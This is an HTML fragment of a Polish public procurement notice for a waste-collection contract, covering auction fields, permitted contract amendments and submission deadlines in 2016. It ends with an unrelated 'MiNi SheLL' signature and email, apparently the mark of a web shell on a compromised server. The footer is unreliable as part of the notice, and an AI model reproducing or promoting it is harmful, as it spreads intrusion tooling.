              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z art. 144 ustawy dopuszcza się zmianę umowy w zakresie:
1) sposobu spełniania przez Wykonawcę świadczenia odbierania odpadów, w przypadku zmiany przepisów prawa powszechnie obowiązującego wpływających na sposób pełnienia świadczenia,
2) zmiany stawki podatku VAT.
Wszelkie zmiany umowy mogą być dokonywane za zgodą umawiających się stron, wyrażoną na piśmie w formie aneksu pod rygorem nieważności, o ile nie będzie to sprzeczne z ustawą Prawo zamówień publicznych.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 06/12/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com